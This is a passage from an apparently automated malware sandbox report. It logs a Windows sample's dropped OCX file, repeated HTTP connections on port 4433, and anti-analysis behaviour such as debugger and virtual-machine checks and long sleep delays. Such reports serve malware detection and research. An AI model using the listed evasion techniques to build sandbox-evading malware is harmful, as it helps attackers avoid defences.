            Source: Yara matchFile source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPED
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE03586 push ecx; ret 13_2_7EE03599
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E3586 push ecx; ret 18_2_7F7E3599
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F123586 push ecx; ret 36_2_7F123599
            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\8f08\user-PC\user-PC.ocxJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49713
            Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49714
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49754
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49757
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49764
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49774
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49776
            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49777
            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49778
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49780
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49782
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49784
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49787
            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49788
            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49789
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49791
            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49792
            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49793
            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49794
            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49795
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49800
            Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49801
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49805
            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49806
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49809
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49811
            Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49813
            Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49814
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49816
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49818
            Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49819
            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49820
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 4433
            Source: unknownNetwork traffic detected: HTTP traffic on port 4433 -> 49821
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_13-47362
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_13-47359
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: foregroundWindowGot 874Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: foregroundWindowGot 874Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: foregroundWindowGot 875
            Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\user-PC\user-PC.ocxJump to dropped file
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 0.0 %
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288Thread sleep count: 96 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7288Thread sleep time: -12480000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8780 GetSystemInfo,13_2_7EDE8780
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
            Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZTOJcUlTUW1aOTU+/PvgsSHSh7gMPqYBL4au5h9qMu51NPvmcix0zDwiiXJJcFFt
            Source: rundll32.exe, 0000000D.00000003.1392652563.000000000570D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cfuNua4s2oHZikvmCIgeaGRZPRANIrEH7Qx3faVzu/U8KOC2n1zUotY6XrkUbdKV
            Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4E
            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_13-47355
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_7EE03887
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF4D480 mov eax, dword ptr fs:[00000030h]13_2_6CF4D480
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB9F44 mov edx, dword ptr fs:[00000030h]13_2_7EDB9F44
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8C30 mov ecx, dword ptr fs:[00000030h]13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8C30 mov eax, dword ptr fs:[00000030h]13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8C30 mov edx, dword ptr fs:[00000030h]13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8C30 mov eax, dword ptr fs:[00000030h]13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE8C30 mov ecx, dword ptr fs:[00000030h]13_2_7EDE8C30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov edx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov ecx, dword ptr fs:[00000030h]13_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D60 mov eax, dword ptr fs:[00000030h]13_2_7EDF1D60
